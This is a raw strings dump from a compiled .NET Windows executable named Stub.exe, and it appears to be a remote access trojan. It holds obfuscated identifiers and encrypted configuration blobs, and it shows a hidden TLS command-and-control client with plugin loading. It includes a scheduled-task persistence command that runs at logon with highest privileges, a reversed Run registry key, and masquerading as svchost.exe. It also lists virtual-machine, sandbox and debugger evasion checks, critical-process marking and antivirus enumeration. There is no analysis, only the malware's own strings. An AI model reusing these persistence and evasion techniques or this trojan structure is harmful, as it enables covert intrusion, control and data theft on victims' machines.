!This program cannot be run in DOS mode.
`.rsrc
@.reloc
v4.0.30319
#Strings
Action`10
IEnumerable`1
CallSite`1
List`1
Microsoft.Win32
ToUInt32
ToInt32
X509Certificate2
ToUInt64
ToInt64
ToUInt16
ToInt16
HMACSHA256
get_UTF8
<Module>
JFNBRNEOHDA
IvtskCjZtApDA
hUUMhsyMJGA
anqpvgjNVZDtQuGA
KzviuhUAROOA
vAzBoHNnrVA
PSfpRmKsdJINcA
qnjSpUJJdygBxeA
DwHLylDUBEYhA
SAKAXPxDDmA
cHRVlrXErA
aZUvlQQuChZmrA
YGVpMLZFvA
tDbpSPeKNwA
qBOrGWKLZdNEB
eLMEmzzxyNZOqLB
jxhLNmBUMKXurNB
DKjzksLnREdvzRB
QZIcYrbVdRWyTSB
YGsDWyrIXnKPlB
CZrplYogFcPNzB
HpghUSIaDHC
JwTnTuzMdMC
HBPJbvtlxfgzTRfC
upXCTAsqdsiC
aBMIyCOksNmC
pfcnhlZssbDD
MapNameToOID
ayAAfgBdgQNeJOrID
get_FormatID
ibGoBJHAHwjKD
YMXaJzSjcND
cEsKBuGGvEKQdD
tPtuvPdShwnD
IACJowUocKDbhoD
zHbaQmwyZFE
uAMLkQRmANCbnUE
vuSwgpQkgE
lAJcPoPMgSyE
DzaciSWHkVF
XfDutdERrUxwqPeF
RdewiXpdwghF
kjqTNjbnfQcVqhmF
qPpHbLjnpjnF
yIkzYwvDVKRCyF
gFsukKmzpGKVDG
JqptkCGdVVG
zqVGZlSxhzUcG
ERHfYLKRGfXXgG
lRXdlatKeQfnG
sMquvhoOkTrG
BkvCOXtkpVDwrG
YKqIvdNlHSSzsG
pPhUpYoPVCgCwG
ZytfmRpSQADXfwG
PplqJnlztXBH
HlOstAreXkuMOH
cRRtmTQWGJdZBTH
oVKYzPAbwCSrRhH
dKDSIObzzDJWmH
webOpXjgcPzuH
get_ASCII
wZrkHnIraJI
LGZWYNLEqxzTI
GmLGgIZDYI
BHzLEJEAPmI
HoQsgrEOfkmI
FepRwLOOoawI
JNSUzkTlQxI
gKRvPusBvZSXxyI
WneBwiSVCHJ
SGfSxyTwLJ
UcgVWGuWkwlbJ
tSNKoTPgJBfJ
mPHYpJLeWnHK
zYHWHQjlPIK
XydRLmnKokJK
vuJwttLXioENK
yPZVIPxmFQK
vJZLsKXuZK
zSwstDXFWiZgveK
SnLJptMXrVNL
crOWmSRdgqiWL
jliCdzuowjoL
SuRbZOgugTnRvL
XDuQFtgHBM
JmCEEYKASVSM
wBrHBEKNKykFYM
VnRBzFiiUxitfcM
AkgVawXUxVfM
cyJaPBEwIbBlfrfM
bBsxNlRBlM
fYHCRGffdxM
nvDyMmPbwzM
jFMoyvnaAN
ISDaFSmKWTYtpAN
MiGLufcuTfnAdN
jipuwBTragjN
yCYRZmQsLIPmN
System.IO
FXrJKtVRkLIO
OhcQeLIXLlHcO
deKfIWtKUGCeO
VshmYjWxifYiO
uuoABtVNvkDjO
FzlILhnlXemO
TLtfeDwlWPArvO
YiMadgNOdlEP
irKoWrlTZiAZnP
QLoDvkVkARTHoP
WqKhwJKTnCPmYVPjCQ
DROYqlonOQ
ntiKTsdtRbQ
AYEzdrgHdQ
nnwnczbZgQWtgQ
daxhNHpjuSPhQ
fqYWJWSbxQ
hTvEaImlMIR
GweTJuArNJTR
gxTaFLBLDFaXR
OtPLbRnbxiR
AUhTTgJozIMPyR
dwmbXTkjoPzPpOS
zOchlrxXKQS
dTvoehsqijoS
AiPCstPSdrHJET
rKpVheZVgSMT
VwEZGWOofEbT
cSLPRWWrVsT
yXmMVOCPcNtT
rGrmmFKHMzVAU
fDPvyVffonNVU
oVkvhFyDlNIdU
aQQpuveNxKROpuU
LZMSTmDbyUXhvU
get_IV
set_IV
GenerateIV
HvMdxyBQnazLV
wURuvDHVIsVV
ZumyZAUFulxhxXV
dyQkqMobDMdDW
yqHOSBKRJtIW
vzfOqlsjLLjKW
QVtfllthdW
uMBOTbuCXWrwkW
ZRNBEQSQdOxCqW
QnvAjetEEbfgBwW
FYrOwzSHTX
dVmEiYoEcXX
ksmlOXzDIPZhFY
zgNZoMEMwHY
KxzpygPEIUQNY
MhDOKeXMjBeY
vjgMBmYIJUEfY
qEEGcCiLwhOugY
cjFpBNQQtWtfAZ
UYxfUdftvEZ
HUnISxPlFZ
synCwGOvgHZ
oSsXypboeVITzJZ
nAfdPeSodxCVqSZ
KirVpehaYZ
GZarUVuDZZ
mjXxtguDAqfvccwoeZ
RsRVgfnahgZ
aLILeGoREjlZ
ZCsfOCHxqZ
ASElhgspcZiyZ
value__
OrmrNxVEfyIa
PhHPPQrPVYMcNa
PPecfcoVoEbJzWhga
almDKmWUMNma
GOqnZHPpLIb
oqqxVAyZPwqJPb
tLaTlDNVObgYanTb
vMxHrUjoaYZb
mscorlib
adGRbkgsgwsb
ZutkkHaZFc
HpqAkjBCDpWJNc
AwVvpOZcESYc
vutrKjpPsQqtTAFbc
System.Collections.Generic
Microsoft.VisualBasic
XnKNnLPATvic
get_SendSync
EWQcIcTddrc
PCadnaMWImYuc
sNTsZuWbWEnFBd
oHTEiYReRGYFQd
XErjJeLcQd
DSdfzBfqPtSd
EndRead
BeginRead
Thread
ZeIMzhxzbRLed
SHA256Managed
get_Connected
get_IsConnected
set_IsConnected
jPMnXFXuVChd
get_Guid
<SendSync>k__BackingField
<IsConnected>k__BackingField
<KeepAlive>k__BackingField
<HeaderSize>k__BackingField
<Ping>k__BackingField
<ActivatePong>k__BackingField
<Interval>k__BackingField
<Buffer>k__BackingField
<Offset>k__BackingField
<SslClient>k__BackingField
<TcpClient>k__BackingField
Append
RegistryValueKind
KQliYKEAKoqnd
IPHXRIcZzVkJCe
UpzvJtFRzWqTFe
Replace
CreateInstance
set_Mode
FileMode
PaddingMode
EnterDebugMode
CryptoStreamMode
CompressionMode
CipherMode
SelectMode
DeleteSubKeyTree
get_Message
RKFTQoBwvie
Invoke
IEnumerable
IDisposable
ToDouble
get_Handle
RuntimeFieldHandle
GetModuleHandle
RuntimeTypeHandle
GetTypeFromHandle
WaitHandle
ToSingle
IsInRole
WindowsBuiltInRole
get_MainModule
ProcessModule
set_WindowStyle
ProcessWindowStyle
get_Name
get_FileName
set_FileName
GetTempFileName
GetFileName
get_MachineName
get_OSFullName
get_FullName
get_UserName
CheckHostName
DateTime
get_LastWriteTime
ToUniversalTime
WriteLine
Combine
UriHostNameType
get_ValueType
ProtocolType
GetType
SocketType
uvTaTyQSzhxeGre
FileShare
System.Core
Dispose
StrReverse
TtCnCujNQddIte
X509Certificate
Create
SetThreadExecutionState
Delete
CallSite
CompilerGeneratedAttribute
DebuggableAttribute
ComVisibleAttribute
AssemblyTitleAttribute
AssemblyTrademarkAttribute
TargetFrameworkAttribute
AssemblyFileVersionAttribute
AssemblyConfigurationAttribute
AssemblyDescriptionAttribute
DefaultMemberAttribute
CompilationRelaxationsAttribute
AssemblyProductAttribute
AssemblyCopyrightAttribute
AssemblyCompanyAttribute
RuntimeCompatibilityAttribute
set_UseShellExecute
ReadByte
WriteByte
DeleteValue
GetValue
SetValue
get_KeepAlive
set_KeepAlive
Remove
eonJdtGtBCwe
fHConvaOgIPze
set_BlockSize
get_TotalSize
get_HeaderSize
set_HeaderSize
set_SendBufferSize
set_ReceiveBufferSize
set_KeySize
dVGNOnfZdyIKf
wBDDyQtCWdYgNf
idPrgmctgOf
sNqWaeqzLwLPf
IuTfHhgGBroWMdf
EtKRwqekdOBgf
zYpsJRYpEZOlf
kFlWnvkONwfDgnf
lFHYyCYBrLLg
KCBpnXKLVLFNg
lqnhcgtuBMPg
fvEfybOiPtfPg
QCfDqREDDrkJGUUg
sPEbjiIQJPsHXg
CryptoConfig
get_Ping
set_Ping
System.Threading
set_Padding
add_SessionEnding
UTF8Encoding
System.Drawing.Imaging
System.Runtime.Versioning
FromBase64String
ToBase64String
DownloadString
ToString
get_AsString
set_AsString
GetString
Substring
System.Drawing
get_ActivatePong
set_ActivatePong
YyuyFozHnong
set_ErrorDialog
UUtzCipouyVyg
TnqjEfMCwLnyg
fKYKUYVnnYPh
ZDZyhPJrHVBmh
DANHJUbtuBrh
ComputeHash
VerifyHash
get_ExecutablePath
GetTempPath
get_Length
kLzEqBXtOLJNBi
cjFmkOzfsBi
ulQUonJCtfwJi
KxqhAoqWPzi
wWhGvmqlkAj
nznHpdJyapyRXj
JfOufqJBkij
qDhUpeTtmnGk
adnlPpyMYuHQk
DlpoaVZdrcRk
srTmOyDRSk
AsyncCallback
RemoteCertificateValidationCallback
TimerCallback
RegistryKeyPermissionCheck
iZFjlWvSOlck
FlushFinalBlock
LsdvXXHbZlfk
REZaGqoolhk
LcCnCkdrZcnHqk
kafZvZHxztk
MqeFohkjGvk
HQROsnHAHsHl
AtWzzXPwsSIVOOl
SnIKwLqezsVl
aeghoSBuwLKKXl
RtlSetProcessIsCritical
NetworkCredential
System.Security.Principal
WindowsPrincipal
get_Interval
set_Interval
vlIQbkFTUTMbl
MMjcXSdWMNvfl
kernel32.dll
user32.dll
ntdll.dll
FnMvCyUgypl
BvDfJdAnEql
PHHnKUzteTEfKvl
cWfXyvzSAm
WfUvYpVeOm
PEUOIejNqSKWVPm
xEwSrOHbgUtIKQm
yEEpPjQyqRm
lygQYKfLAjtRm
dVucjwZWxYMNnSm
sGdBMLuuZdkTm
xKthVVdDVm
aiHxhYxIWeZVm
weKBdFHDGZm
FileStream
NetworkStream
SslStream
CryptoStream
GZipStream
MemoryStream
get_Item
get_Is64BitOperatingSystem
SymmetricAlgorithm
AsymmetricAlgorithm
HashAlgorithm
Random
ICryptoTransform
RRFrkTEsOvSEn
WtyNHeqDsRn
HqiNLlwSTZn
ToBoolean
tWRqbJfRfn
ghemllyHIwKin
X509Chain
AppDomain
get_CurrentDomain
LThsSSNVtVxmn
GetFileNameWithoutExtension
get_OSVersion
System.IO.Compression
Application
System.Security.Authentication
System.Reflection
X509CertificateCollection
ManagementObjectCollection
set_Position
CryptographicException
ArgumentNullException
ArgumentException
DLztzcgeXMlsqn
qbmSUIxNqVo
ImageCodecInfo
FileInfo
DriveInfo
FileSystemInfo
ComputerInfo
CSharpArgumentInfo
ProcessStartInfo
CiuidVZjKOago
ulJLWTvJjo
hzLPHffDmlRQOVbjo
PtZgLknuMOzMmo
ShUTSOQAnMro
BGlkSzNMPxVXyrto
SMyHrdibRpyPEzo
HYrGKgZSvlDWKFCp
AJKaAVBKOKWUIp
OETPMFwhgIqcOp
HPDkvrcolRbDcDrOp
vBRxXJZAFTp
pKYTrVLsqToBip
xYOhNAKfUmp
Microsoft.CSharp
RcBCywTocUvp
VHRsCGdkHwp
PFolDawyIWmHq
OWPjrBYcPq
IzvvbyNAbq
isVpagfvaRhq
FqCSsPMPbHUwZiq
mMqgVfzUTErHPDxkq
System.Linq
xMpYBKfCTrLrq
VUePFZVUxWatq
LMZyhCZNMr
wOKnFSAnNr
UWmlKjlcAUPWPRr
EJQEnZWWPleWr
InvokeMember
MD5CryptoServiceProvider
RSACryptoServiceProvider
AesCryptoServiceProvider
StringBuilder
Microsoft.CSharp.RuntimeBinder
CallSiteBinder
get_Buffer
set_Buffer
get_AsInteger
set_AsInteger
ManagementObjectSearcher
SessionEndingEventHandler
ToUpper
CurrentUser
StreamWriter
TextWriter
BitConverter
ToLower
GtMZIgumKOXmr
IEnumerator
ManagementObjectEnumerator
System.Collections.IEnumerable.GetEnumerator
Activator
.cctor
Monitor
CreateDecryptor
CreateEncryptor
HwOZNzpywFKTCrr
IntPtr
GxmfUQOevr
BuoqYxMFABs
JZyRgeiNAnsIFs
System.Diagnostics
Microsoft.VisualBasic.Devices
System.Runtime.InteropServices
System.Runtime.CompilerServices
DebuggingModes
ExpandEnvironmentVariables
GetProcesses
GetHostAddresses
System.Security.Cryptography.X509Certificates
Rfc2898DeriveBytes
ReadAllBytes
GetBytes
CSharpArgumentInfoFlags
CSharpBinderFlags
Strings
SessionEndingEventArgs
ICredentials
set_Credentials
Equals
SslProtocols
System.Windows.Forms
Contains
System.Collections
StringSplitOptions
GetImageDecoders
RuntimeHelpers
SslPolicyErrors
FileAccess
GetCurrentProcess
IPAddress
System.Net.Sockets
set_Arguments
SystemEvents
Exists
pwuUiGDolnlfCEt
Concat
ImageFormat
get_AsFloat
set_AsFloat
ManagementBaseObject
Collect
Connect
System.Net
Target
Socket
System.Collections.IEnumerator.Reset
get_Offset
set_Offset
xmQTCHTGsGft
IAsyncResult
ToUpperInvariant
WebClient
get_SslClient
set_SslClient
get_TcpClient
set_TcpClient
AuthenticateAsClient
System.Management
Environment
System.Collections.IEnumerator.get_Current
GetCurrent
CheckRemoteDebuggerPresent
get_RemoteEndPoint
get_Count
get_ProcessorCount
GetPathRoot
ParameterizedThreadStart
Convert
FailFast
ToList
BKAyGgdLvQtt
WUjKKzkFXput
WlfVKoMYniwt
System.Collections.IEnumerator.MoveNext
System.Text
GetWindowText
NCKRpwJlyZGu
JgZOdAmRCaKNu
islZnzpfOu
PkdSbqUFnITu
zRxVpPPZCKlWu
kKXUpymoIyhu
FrgxsLHetanu
NrOWfgXNmou
pireLqfUnpu
ZqOsJVTZluFlAv
HsTWYDvnXZdKphIv
OsEhnusKsIJv
fgNPatQomqBcXaLv
zSUGxXbQvNmuAVv
QKzMeqTTaPigCYv
XzykyquwDNIbRcv
JOFcyOZJpXtv
FaotWjVmXJfivv
cBrLWhceAw
tGuGIfXOPBw
tsGjkgWXHXGw
hzTgyFBwGw
vgFUujPlCgDxbKw
IpyWOkEdzflOw
GmmPeyhLPqSw
GetForegroundWindow
set_CreateNoWindow
gRTfNrBkuXrsw
txCsHtmGtww
RhNeiUOPoxtuww
sAkkOsGUMCuDFSx
XtMVfOKUazHgx
PTpWYMWvqsCBBlx
hFXfVRaFtox
wgpvwyhUPZy
QgmgGQkPZy
InitializeArray
ToArray
get_AsArray
get_Key
set_Key
CreateSubKey
OpenSubKey
get_PublicKey
RegistryKey
System.Security.Cryptography
Assembly
AddressFamily
BlockCopy
ToBinary
get_SystemDirectory
Registry
WqScnOVMicpDity
op_Equality
op_Inequality
System.Net.Security
WindowsIdentity
IsNullOrEmpty
wUdypoBvAhQvy
pUDhRHJmgqLyy
sFEBhCBnNtrAz
sNLbHdXMeLz
HwxnpbwyjCVz
mOJseImVAAFssz
WrapNonExceptionThrows
1.0.0.0
).NETFramework,Version=v4.0,Profile=Client
FrameworkDisplayName .NET Framework 4 Client Profile
_CorExeMain
mscoree.dll
<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">
<trustInfo xmlns="urn:schemas-microsoft-com:asm.v2">
<security>
<requestedPrivileges>
<requestedExecutionLevel level="asInvoker" uiAccess="false" />
</requestedPrivileges>
</security>
</trustInfo>
<compatibility xmlns="urn:schemas-microsoft-com:compatibility.v1">
<application>
<!-- Windows Vista -->
<supportedOS Id="{e2011457-1546-43c5-a5fe-008deee3d3f0}"/>
<!-- Windows 7 -->
<supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}"/>
<!-- Windows 8 -->
<supportedOS Id="{4a2f28e3-53b9-4441-ba9c-d69d4a4a6e38}"/>
<!-- Windows 8.1 -->
<supportedOS Id="{1f676c76-80e1-4239-95bb-83d0f6d0da78}"/>
<!-- Windows 10 -->
<supportedOS Id="{8e0f7a12-bfb3-4fe8-b9a5-48fd50a15a9a}"/>
</application>
</compatibility>
<asmv3:application xmlns:asmv3="urn:schemas-microsoft-com:asm.v3" >
<asmv3:windowsSettings xmlns="http://schemas.microsoft.com/SMI/2005/WindowsSettings">
<dpiAware>true</dpiAware>
</asmv3:windowsSettings>
</asmv3:application>
</assembly>
SHA256
gfK8zPfJ7s1liNUsgCj3bq5bBOS9cxXv08IupqInpxn+rWusylbrrpwsudEeRxEqAsEKj2K9p8cD6GUxrxCA0g==
H3KLwetpFzwNLbKRw8342oaUUWeGIGhLjqnzM1+MT3YQFUDmchNSUwW+vB5Jue1GyTbPq5Sd3Am3e+BgApTFgw==
x0y8boR9rOf1IMhjkfePjhEKepfryc934t0v31xUH6+ExrFznlLhLNf0Lv+1Ggfg/eL//VrGuoKjq2KV8rYTvA==
Mf6YmXVABWod96ZZfI0+Q6H31q9XGdJZ2NOBmgU5bFhDxdxzwvVEeyNye+Hy7HdZKGgw0DfMmD/i+yNUuQbkmg==
%AppData%
svchost.exe
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
Packet
Message
/c schtasks /create /f /sc onlogon /rl highest /tn "
" /tr '"
"' & exit
\nuR\noisreVtnerruC\swodniW\tfosorciM\erawtfoS
@echo off
timeout 3 > NUL
START "" "
" /f /q
Select * from Win32_ComputerSystem
Manufacturer
microsoft corporation
VIRTUAL
vmware
VirtualBox
SbieDll.dll
Err HWID
ClientInfo
Microsoft
Version
Performance
Pastebin
Antivirus
Installed
\root\SecurityCenter2
Select * from AntivirusProduct
displayName
Software\
plugin
savePlugin
sendPlugin
Hashes
Plugin.Plugin
Msgpack
Received
masterKey can not be null or empty.
input can not be null.
Invalid message authentication code (MAC).
{0:D3}
{0:X2}
(never used) type $c1
(ext8,ext16,ex32) type $c7,$c8,$c9
VS_VERSION_INFO
VarFileInfo
Translation
StringFileInfo
000004b0
Comments
CompanyName
FileDescription
FileVersion
1.0.0.0
InternalName
Stub.exe
LegalCopyright
LegalTrademarks
OriginalFilename
Stub.exe
ProductName
ProductVersion
1.0.0.0
Assembly Version
1.0.0.0